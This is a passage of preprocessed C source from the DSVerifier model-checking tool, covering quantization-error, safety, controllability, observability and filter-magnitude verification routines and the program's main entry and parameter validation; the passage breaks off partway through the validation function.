# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ; else __assert_fail (
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
"__quant_error < error_limit && __quant_error > ((-1)*error_limit)"
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h", 354, __extension__ __PRETTY_FUNCTION__); }))
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
;
}
}
else {
for (i=0; i < 0; i++)
{
__quant_error = ss_system_quantization_error(x[i]);
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
((void) sizeof ((
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ; else __assert_fail (
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
"__quant_error < error_limit && __quant_error > ((-1)*error_limit)"
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h", 361, __extension__ __PRETTY_FUNCTION__); }))
# 361 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
;
}
}
return 0;
}
# 44 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
extern digital_system_state_space _controller;
extern double error_limit;
extern int closed_loop;
double fxp_ss_closed_loop_safety(){
double reference[4][4];
double result1[4][4];
double result2[4][4];
fxp_t K_fpx[4][4];
fxp_t outputs_fpx[4][4];
fxp_t result_fxp[4][4];
unsigned int i;
unsigned int j;
unsigned int k;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
reference[i][j]= (_controller.inputs[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<nOutputs;j++){
K_fpx[i][j]=0;
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
outputs_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result_fxp[i][j]=0;
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<nOutputs;j++){
K_fpx[i][j]= fxp_double_to_fxp(_controller.K[i][j]);
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
for (i = 1; i < 0; i++) {
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
if(flag == 1){
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
}
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
for(k=0; k<nOutputs;k++){
for(j=0; j<1;j++){
outputs_fpx[k][j]= fxp_double_to_fxp(_controller.outputs[k][j]);
}
}
fxp_matrix_multiplication(nInputs,nOutputs,nOutputs,1,K_fpx,outputs_fpx,result_fxp);
for(k=0; k<nInputs;k++){
for(j=0; j<1;j++){
result1[k][j]= fxp_to_double(result_fxp[k][j]);
}
}
printf("### fxp: U (before) = %.9f", _controller.inputs[0][0]);
printf("### fxp: reference = %.9f", reference[0][0]);
printf("### fxp: result1 = %.9f", result1[0][0]);
printf("### fxp: reference - result1 = %.9f", (reference[0][0] - result1[0][0]));
double_sub_matrix(nInputs,
1,
reference,
result1,
_controller.inputs);
printf("### fxp: Y = %.9f", _controller.outputs[0][0]);
printf("### fxp: U (after) = %.9f \n### \n### ", _controller.inputs[0][0]);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
}
return _controller.outputs[0][0];
}
int verify_safety_state_space(void){
fxp_t output_fxp = fxp_ss_closed_loop_safety();
double output_double = fxp_to_double(output_fxp);
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
((void) sizeof ((
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
output_double <= error_limit
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
output_double <= error_limit
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
) ; else __assert_fail (
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
"output_double <= error_limit"
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h", 140, __extension__ __PRETTY_FUNCTION__); }))
# 140 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_safety_state_space.h"
;
return 0;
}
# 45 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 1
# 14 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
extern digital_system_state_space _controller;
int verify_controllability(void){
int i;
int j;
fxp_t A_fpx[4][4];
fxp_t B_fpx[4][4];
fxp_t controllabilityMatrix[4][4];
fxp_t backup[4][4];
fxp_t backupSecond[4][4];
double controllabilityMatrix_double[4][4];
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
A_fpx[i][j] = 0.0;
B_fpx[i][j] = 0.0;
controllabilityMatrix[i][j] = 0.0;
backup[i][j] = 0.0;
backupSecond[i][j] = 0.0;
controllabilityMatrix_double[i][j] = 0.0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
B_fpx[i][j]= fxp_double_to_fxp(_controller.B[i][j]);
}
}
if(nInputs > 1){
int l = 0;
for(j=0; j<(nStates*nInputs);){
fxp_exp_matrix(nStates,nStates,A_fpx,l,backup);
l++;
fxp_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,B_fpx,backupSecond);
for(int k = 0; k < nInputs; k++){
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][k];
}
j++;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
backup[i][j]= 0.0;
}
}
fxp_transpose(controllabilityMatrix,backup,nStates,(nStates*nInputs));
fxp_t mimo_controllabilityMatrix_fxp[4][4];
fxp_matrix_multiplication(nStates,(nStates*nInputs),(nStates*nInputs),nStates,controllabilityMatrix,backup,mimo_controllabilityMatrix_fxp);
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
controllabilityMatrix_double[i][j]= fxp_to_double(mimo_controllabilityMatrix_fxp[i][j]);
}
}
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix_double,nStates) != 0"
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 91, __extension__ __PRETTY_FUNCTION__); }))
# 91 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
} else {
for(j=0; j<nStates;j++){
fxp_exp_matrix(nStates,nStates,A_fpx,j,backup);
fxp_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,B_fpx,backupSecond);
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][0];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
controllabilityMatrix_double[i][j]= fxp_to_double(controllabilityMatrix[i][j]);
}
}
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix_double,nStates) != 0
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix_double,nStates) != 0"
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 113, __extension__ __PRETTY_FUNCTION__); }))
# 113 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
}
return 0;
}
int verify_controllability_double(void){
int i;
int j;
double controllabilityMatrix[4][4];
double backup[4][4];
double backupSecond[4][4];
double controllabilityMatrix_double[4][4];
if(nInputs > 1){
int l = 0;
for(j=0; j<(nStates*nInputs);){
double_exp_matrix(nStates,nStates,_controller.A,l,backup);
l++;
double_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,_controller.B,backupSecond);
for(int k = 0; k < nInputs; k++){
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][k];
}
j++;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nInputs);j++){
backup[i][j]= 0.0;
}
}
transpose(controllabilityMatrix,backup,nStates,(nStates*nInputs));
double mimo_controllabilityMatrix_double[4][4];
double_matrix_multiplication(nStates,(nStates*nInputs),(nStates*nInputs),nStates,controllabilityMatrix,backup,mimo_controllabilityMatrix_double);
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(mimo_controllabilityMatrix_double,nStates) != 0
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(mimo_controllabilityMatrix_double,nStates) != 0
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(mimo_controllabilityMatrix_double,nStates) != 0"
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 154, __extension__ __PRETTY_FUNCTION__); }))
# 154 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
} else {
for(j=0; j<nStates;j++){
double_exp_matrix(nStates,nStates,_controller.A,j,backup);
double_matrix_multiplication(nStates,nStates,nStates,nInputs,backup,_controller.B,backupSecond);
for(i = 0; i<nStates;i++){
controllabilityMatrix[i][j]= backupSecond[i][0];
}
}
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
((void) sizeof ((
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix,nStates) != 0
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
determinant(controllabilityMatrix,nStates) != 0
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
) ; else __assert_fail (
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
"determinant(controllabilityMatrix,nStates) != 0"
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h", 163, __extension__ __PRETTY_FUNCTION__); }))
# 163 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_controllability.h"
;
}
return 0;
}
# 46 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
extern digital_system_state_space _controller;
int verify_observability(void){
int i;
int j;
fxp_t A_fpx[4][4];
fxp_t C_fpx[4][4];
fxp_t observabilityMatrix[4][4];
fxp_t backup[4][4];
fxp_t backupSecond[4][4];
double observabilityMatrix_double[4][4];
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix[i][j]= 0;
A_fpx[i][j]=0;
C_fpx[i][j]= 0;
backup[i][j]= 0;
backupSecond[i][j]= 0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
C_fpx[i][j]= fxp_double_to_fxp(_controller.C[i][j]);
}
}
if(nOutputs > 1){
int l;
j = 0;
for(l=0; l<nStates;){
fxp_exp_matrix(nStates,nStates,A_fpx,l,backup);
l++;
fxp_matrix_multiplication(nOutputs,nStates,nStates,nStates,C_fpx,backup,backupSecond);
for(int k = 0; k < nOutputs; k++){
for(i = 0; i<nStates;i++){
observabilityMatrix[j][i]= backupSecond[k][i];
}
j++;
}
}
# 80 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
for(i=0; i<nStates;i++){
for(j=0; j<(nStates*nOutputs);j++){
backup[i][j]= 0.0;
}
}
fxp_transpose(observabilityMatrix,backup,(nStates*nOutputs),nStates);
# 99 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
fxp_t mimo_observabilityMatrix_fxp[4][4];
fxp_matrix_multiplication(nStates,(nStates*nOutputs),(nStates*nOutputs),nStates,backup,observabilityMatrix,mimo_observabilityMatrix_fxp);
# 112 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix_double[i][j]= fxp_to_double(mimo_observabilityMatrix_fxp[i][j]);
}
}
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
((void) sizeof ((
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ; else __assert_fail (
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
"determinant(observabilityMatrix_double,nStates) != 0"
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h", 119, __extension__ __PRETTY_FUNCTION__); }))
# 119 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
;
}else{
for(i=0; i<nStates;i++){
fxp_exp_matrix(nStates,nStates,A_fpx,i,backup);
fxp_matrix_multiplication(nOutputs,nStates,nStates,nStates,C_fpx,backup,backupSecond);
for(j = 0; j<nStates;j++){
observabilityMatrix[i][j]= backupSecond[0][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
observabilityMatrix_double[i][j]= fxp_to_double(observabilityMatrix[i][j]);
}
}
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
((void) sizeof ((
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
determinant(observabilityMatrix_double,nStates) != 0
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
) ; else __assert_fail (
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
"determinant(observabilityMatrix_double,nStates) != 0"
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h", 134, __extension__ __PRETTY_FUNCTION__); }))
# 134 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_observability.h"
;
}
return 0;
}
# 47 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h"
extern filter_parameters filter;
extern implementation impl;
extern digital_system ds;
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_magnitude.h"
void resp_mag(double* num, int lnum, double* den, int lden, double* res, int N) {
double w;
int m, i;
double out_numRe[N + 1];
double out_numIm[N + 1];
double out_denRe[N + 1];
double out_denIm[N + 1];
double old_out_Re;
double zero_test;
for (w = 0, i = 0; w <= 3.14159265358979323846; w += 3.14159265358979323846 / N, ++i) {
out_numRe[i] = num[0];
out_numIm[i] = 0;
for (m = 1; m < lnum; ++m) {
old_out_Re = out_numRe[i];
out_numRe[i] = cosTyl(w, 6) * out_numRe[i] - sinTyl(w, 6) * out_numIm[i] + num[m];
out_numIm[i] = sinTyl(w, 6) * old_out_Re + cosTyl(w, 6) * out_numIm[i];
}
out_denRe[i] = den[0];
out_denIm[i] = 0;
for (m = 1; m < lden; ++m) {
old_out_Re = out_denRe[i];
out_denRe[i] = cosTyl(w, 6) * out_denRe[i] - sinTyl(w, 6) * out_denIm[i] + den[m];
out_denIm[i] = sinTyl(w, 6) * old_out_Re + cosTyl(w, 6) * out_denIm[i];
}
res[i] = sqrt3(out_numRe[i] * out_numRe[i] + out_numIm[i] * out_numIm[i]);
zero_test = sqrt3(out_denRe[i] * out_denRe[i] + out_denIm[i] * out_denIm[i]);
__DSVERIFIER_assume(zero_test != 0);
res[i] = res[i] / zero_test;
}
}
int verify_magnitude(void) {
int freq_response_samples = 100;
double w;
double w_incr = 1.0 / freq_response_samples;
double res[freq_response_samples+1];
int i,j;
fxp_t a_fxp[ds.a_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
double _a[ds.a_size];
fxp_to_double_array(_a, a_fxp, ds.a_size);
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
double _b[ds.b_size];
fxp_to_double_array(_b, b_fxp, ds.b_size);
resp_mag(ds.b, ds.b_size, ds.a, ds.a_size, res, freq_response_samples);
if (filter.type == 1) {
for (i = 0, w = 0; (w <= 1.0); ++i, w += w_incr) {
if (w <= filter.wp) {
__DSVERIFIER_assert_msg(res[i] >= filter.Ap, "|----------------Passband Failure-------------|");
} else if (w == filter.wc) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ac, "|-------------Cutoff Frequency Failure--------|");
} else if ((w >= filter.wr) && (w <= 1)) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ar, "|----------------Stopband Failure-------------|");
}
}
} else if (filter.type == 2) {
for (i = 0, w = 0; (w <= 1.0); ++i, w += w_incr) {
if (w <= filter.wr) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ar, "|----------------Stopband Failure-------------|");
} else if (w == filter.wc) {
__DSVERIFIER_assert_msg(res[i] <= filter.Ac, "|-------------Cutoff Frequency Failure--------|");
} else if ((w > filter.wp) && (w <= 1)) {
__DSVERIFIER_assert_msg(res[i] >= filter.Ap, "|----------------Passband Failure-------------|");
}
}
} else {
__DSVERIFIER_assert(0);
}
return 0;
}
# 48 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
extern digital_system ds;
extern digital_system plant;
digital_system plant_cbmc;
extern digital_system controller;
extern implementation impl;
extern hardware hw;
extern digital_system_state_space _controller;
extern filter_parameters filter;
unsigned int nondet_uint();
extern void initials();
void validation();
void call_verification_task(void * verification_task);
void call_closedloop_verification_task(void * closedloop_verification_task);
float nondet_float();
double nondet_double();
int main(){
initialization();
validation();
if (1 == 0)
rounding_mode = 0;
else if (1 == 1)
rounding_mode = 1;
else if (1 == 2)
rounding_mode = 2;
if (7 == 3)
{
call_verification_task(&verify_overflow);
}
else if (7 == 2)
{
call_verification_task(&verify_limit_cycle);
}
else if (7 == 6)
{
call_verification_task(&verify_error);
}
else if (7 == 1)
{
call_verification_task(&verify_zero_input_limit_cycle);
}
else if (7 == 4)
{
call_verification_task(&verify_timing_msp_430);
}
else if (7 == 5)
{
call_verification_task(&verify_generic_timing);
}
else if (7 == 7)
{
call_verification_task(&verify_stability);
}
else if (7 == 8)
{
call_verification_task(&verify_minimum_phase);
}
else if (7 == 9)
{
call_closedloop_verification_task(&verify_stability_closedloop_using_dslib);
}
else if (7 == 10)
{
call_closedloop_verification_task(&verify_limit_cycle_closed_loop);
}
else if (7 == 11)
{
call_closedloop_verification_task(&verify_error_closedloop);
}
else if (7 == 12)
{
verify_error_state_space();
}
else if (7 == 16)
{
verify_safety_state_space();
}
else if (7 == 13)
{
verify_controllability();
}
else if (7 == 14)
{
verify_observability();
}
else if (7 == 15)
{
verify_limit_cycle_state_space();
}
else if (7 == 18)
{
call_verification_task(&verify_magnitude);
}
return 0;
}
void validation()
{
if (7 == 12 || 7 == 16 ||
7 == 15 || 7 == 13 ||
7 == 14)
{
if (0 == 0)
{
printf("\n\n********************************************************************************************\n");
printf("* set a K_SIZE to use this property in DSVerifier (use: -DK_SIZE=VALUE) *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
exit(1);
}
initials();
return;
}
if (((7 != 9) && (7 != 10) &&
(7 != 11)) && (ds.a_size == 0 || ds.b_size == 0))
{
printf("\n\n****************************************************************************\n");
printf("* set (ds and impl) parameters to check with DSVerifier *\n");
printf("****************************************************************************\n");
__DSVERIFIER_assert(0);
}
if ((7 == 9) || (7 == 10) ||
(7 == 11))
{
if (controller.a_size == 0 || plant.b_size == 0 || impl.int_bits == 0 )
{
printf("\n\n*****************************************************************************************************\n");
printf("* set (controller, plant, and impl) parameters to check CLOSED LOOP with DSVerifier *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else
{
printf("\n\n*****************************************************************************************************\n");
printf("* set (controller and impl) parameters so that they do not overflow *\n");
printf("*****************************************************************************************************\n");
unsigned j;
for (j = 0; j < controller.a_size; ++j)
{
const double value=controller.a[j];
__DSVERIFIER_assert(value <= _dbl_max);
__DSVERIFIER_assert(value >= _dbl_min);
}
for (j = 0; j < controller.b_size; ++j)
{
const double value=controller.b[j];
__DSVERIFIER_assert(value <= _dbl_max);
__DSVERIFIER_assert(value >= _dbl_min);
}
}
if (controller.b_size > 0)
{
unsigned j, zeros=0;
for (j = 0; j < controller.b_size; ++j)
{
if (controller.b[j]==0)
++zeros;
}
